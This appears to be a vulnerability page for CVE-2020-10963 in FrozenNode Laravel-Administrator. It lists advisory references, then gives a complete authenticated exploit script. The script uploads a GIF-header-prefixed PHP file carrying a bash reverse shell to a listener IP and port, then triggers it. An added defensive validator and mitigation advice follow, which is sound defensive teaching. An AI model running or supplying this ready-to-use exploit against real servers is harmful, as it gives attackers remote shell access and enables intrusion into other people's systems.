| Title | Published | Views | Family |
|---|---|---|---|
| FrozenNode Laravel-Administrator Code Issue Vulnerability | 26 Mar 2020 00:00 | – | cnvd |
| CVE-2020-10963 | 25 Mar 2020 21:23 | – | cve |
| CVE-2020-10963 | 25 Mar 2020 21:23 | – | cvelist |
| FrozenNode Laravel-Administrator unrestricted file upload | 24 May 2022 17:12 | – | github |
| CVE-2020-10963 | 25 Mar 2020 22:15 | – | nvd |
| GHSA-9R2J-RG24-FVPJ FrozenNode Laravel-Administrator unrestricted file upload | 24 May 2022 17:12 | – | osv |
| Laravel Administrator 4 File Upload | 27 Nov 2020 00:00 | – | packetstorm |
| Unrestricted file upload | 25 Mar 2020 22:15 | – | prion |
| PT-2020-12451 · Frozennode · Laravel-Administrator | 25 Mar 2020 00:00 | – | ptsecurity |
| CVE-2020-10963 | 22 May 2025 15:10 | – | redhatcve |
```python
#!/usr/bin/env python
# Exploit title: Laravel Administrator 4 - Unrestricted File Upload (Authenticated)
# Author: Victor Campos and Xavi Beltran
# Contact: [email protected]
# Exploit Development: https://xavibel.com/2020/03/23/unrestricted-file-upload-in-frozennode-laravel-administrator/
# Date: 25/3/2020
# Software link: https://github.com/FrozenNode/Laravel-Administrator/
# Version : 4
# Tested on: Laravel-Administrator 4
# CVE : CVE-2020-10963

import requests
import json
import traceback

# Parameters to be set up (ENTER YOUR VALUES)
# ===========================================
# Listener IP and port
ip = ""
port = ""
# Admin credentials
user = ""
password = ""
# URLs of the web application
domain = ""            # For example "https://www.example.com"
login_url = ""         # For example "/user/login"
fileupload_url = ""    # For example "/admin/categories/image/file_upload"
uploaded_files_url = ""  # For example "/categories/images"

# Reverse shell payload (DO NOT MODIFY THIS SECTION)
# ==================================================
# GIF file header, so the upload passes the image check
shell = "GIF89a\r\n"
# php reverse shell appended after the image header
shell += "\x3c?php\r\nexec(\"/bin/bash -c \'bash -i \x3e /dev/tcp/" + ip + "/" + port + " 0\x3e&1\'\");?\x3e\r\n"

with requests.Session() as s:
    try:
        print("\n[+] Logging into the panel")
        # Authenticate as admin; the session cookie is kept by the Session object
        s.post(domain + login_url, data={'email': user, 'password': password, 'remember': '1'})
        print("[+] Uploading the malicious file")
        # The file is sent with a .php name; the server stores it under the name it returns
        r = s.post(domain + fileupload_url, files={'name': 'Picture.png', 'file': ('test.php', shell)})
        print("[+] Response text:")
        #print(r.text)
        shell_file = json.loads(r.text)["filename"]
        print("[+] Name of uploaded file: " + shell_file)
        print("\n[+] Executing the reverse shell on " + ip + ":" + port + "...")
        # Requesting the stored file makes the server execute it
        r = s.get(domain + uploaded_files_url + '/' + shell_file)
    except Exception as e:
        print(str(traceback.format_exc()))
```
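The payload above works because the upload handler accepts a file whose content starts with a valid image header even though its name ends in `.php`, and then serves it from a location where PHP executes. The following validator is an added example written for this page (it is not code from Laravel-Administrator, from the exploit authors, or from any fix to the project); it contrasts a magic-byte-only check, which the `GIF89a` prefix trick passes, with a hardened check that requires an allowlisted extension, agreement between extension and detected content, no double extensions or path components, and no embedded script markers. The extension allowlist, the magic-byte table and the marker regex are illustrative choices, not the project's configuration.

```python
"""Upload validation that rejects an image-header-plus-PHP polyglot (added example)."""
import os
import re

# Illustrative allowlist: only image extensions may be stored by this endpoint.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}

# Magic bytes mapped to the extension they are allowed to appear under.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}

# Script markers that have no business inside an image file.
SCRIPT_MARKERS = re.compile(rb"<\?(php|=)|<%|<script", re.IGNORECASE)


def naive_check(filename, data):
    """Magic-byte-only acceptance: the kind of check a GIF header prepended to a script defeats."""
    return any(data.startswith(magic) for magic in MAGIC)


def detect_type(data):
    """Return the extension implied by the file's leading bytes, or None if unrecognised."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def hardened_check(filename, data):
    """Return (accepted, reason) after checking name and content together."""
    # Reject anything that is not a bare file name (path traversal, empty name).
    if not filename or os.path.basename(filename) != filename or "\\" in filename:
        return False, "name contains path components or is empty"
    root, ext = os.path.splitext(filename)
    ext = ext.lower()
    # The final extension must be on the allowlist; .php is rejected here.
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension %r not allowed" % ext
    # Reject double extensions such as shell.php.gif, which some servers map to PHP.
    if "." in root:
        return False, "double extension"
    detected = detect_type(data)
    if detected is None:
        return False, "content is not a recognised image"
    # Extension and content must agree (.jpg and .jpeg are the same type).
    same_type = detected == ext or (detected == ".jpg" and ext == ".jpeg")
    if not same_type:
        return False, "extension/content mismatch"
    # An image that carries script markers is a polyglot, not an image.
    if SCRIPT_MARKERS.search(data):
        return False, "embedded script markers"
    return True, "ok"


# Constructed sample inputs for demonstration.
POLYGLOT = b"GIF89a\r\n<?php echo 'x'; ?>\r\n"   # image header followed by PHP
TINY_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff;"  # header plus dummy body


def demo():
    """Run both checks over the constructed samples and return the outcomes."""
    return {
        "naive_accepts_polyglot": naive_check("test.php", POLYGLOT),
        "hardened_polyglot_php": hardened_check("test.php", POLYGLOT),
        "hardened_polyglot_gif": hardened_check("pic.gif", POLYGLOT),
        "hardened_double_ext": hardened_check("shell.php.gif", TINY_GIF),
        "hardened_traversal": hardened_check("../pic.gif", TINY_GIF),
        "hardened_real_gif": hardened_check("pic.gif", TINY_GIF),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Validation alone is only half of the mitigation: stored uploads should also be written under a server-generated random name, kept outside the document root or in a directory where the web server has script execution disabled, and served with a fixed content type so that a file which slips through is still never executed.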